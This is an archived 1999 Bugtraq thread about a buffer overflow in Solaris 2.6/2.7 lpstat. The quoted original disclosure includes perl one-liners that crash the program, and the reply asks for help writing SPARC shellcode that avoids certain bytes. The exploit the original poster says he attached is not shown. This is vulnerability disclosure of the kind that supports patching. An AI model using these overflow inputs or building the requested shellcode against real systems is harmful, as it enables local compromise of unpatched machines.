Bugtraq mailing list archives
Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat
From: gang_w () goselecttech com (GANG WANG)
Date: Mon, 8 Feb 1999 18:31:50 -0800
Things are a little different on Solaris 2.6 Sparc. lpstat only accepts a buffer which doesn't contain \x20,\x0a or \x3b. Can sb teach me how to write a shellcode on solaris sparc without those charaters? I feel that I'm so stupid:-( G. -----Original Message----- From: plasmoid deep/thc/clb <plasmoid () PIMMEL COM> To: BUGTRAQ () NETSPACE ORG <BUGTRAQ () NETSPACE ORG> Date: Wednesday, January 27, 1999 11:16 AM Subject: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat
On Aug/25/98 Sun released the following patches for lp: Solaris2.6 Sparc: 106235-02 Solaris2.6 x86: 106236 It is quite sad, that they did not fix another overflow in /usr/bin/lpstat. I testified this bug on either Solaris 2.7 x86 and 2.6 Sparc, I assume that it is also present on Solaris 2.6 x86 and 2.7 Sparc. Solaris 2.7 x86 % plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'` % UX:lpstat: ERROR: Class [...] % AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does % not exist. % TO FIX: Use the "lpstat -c all" command to list % all known classes. % Segmentation Fault % plasmoid@gorkie:foo> Solaris 2.6 Sparc % plasmoid@bock:foo> lpstat -c `perl -e 'print "AAAA" x 250'` % UX:lpstat: ERROR: Class [...] % AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does not % exist. % TO FIX: Use the "lpstat -c all" command to list % all known classes. % Segmentation Fault % plasmoid@bock:foo> This overflow is definitly exploitable, i attached the exploit for Solaris x86. Quality patches for all Solaris versions can be obtained from www.hert.org, a fast security source. plasmoid deep/thc/clb http://thc.inferno.tusculum.edu
Current thread:
- Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat GANG WANG (Feb 08)
- <Possible follow-ups>
- Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat GANG WANG (Feb 08)